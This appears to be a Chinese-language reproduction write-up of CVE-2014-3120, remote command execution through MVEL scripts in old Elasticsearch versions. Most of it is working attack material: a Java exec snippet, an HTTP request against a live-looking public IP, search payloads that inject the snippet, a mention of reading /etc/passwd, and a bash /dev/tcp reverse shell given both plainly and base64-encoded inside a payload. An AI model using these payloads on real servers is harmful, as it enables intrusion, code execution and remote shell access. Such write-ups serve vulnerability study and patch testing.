CVE-2014-3120命令执行漏洞
一、漏洞详情
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。
MVEL执行命令代码:
import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\A").next();
二、漏洞复现
访问 http://47.236.138.222:9200/
在Repeater中修改报文,通过_search来获取payload的响应结果。此时需要注意,如果库里没有数据的情况下,需要先写入一条数据后,才可以注入成功。
POST /helloword/hello HTTP/1.1
Host: 47.236.138.222:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
{
"name":"esdemo"
}
再次获取注入结果
{
"size": 1,
"script_fields":{
"command": {
"script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
查看etc/passwd
反弹连接
bash -i >&/dev/tcp/192.168.226.130/7777 0>&1
bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMjI2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
构造payload
{
"size": 1,
"script_fields":{
"command": {
"script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMjI2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
开启监听重新放包(失败)
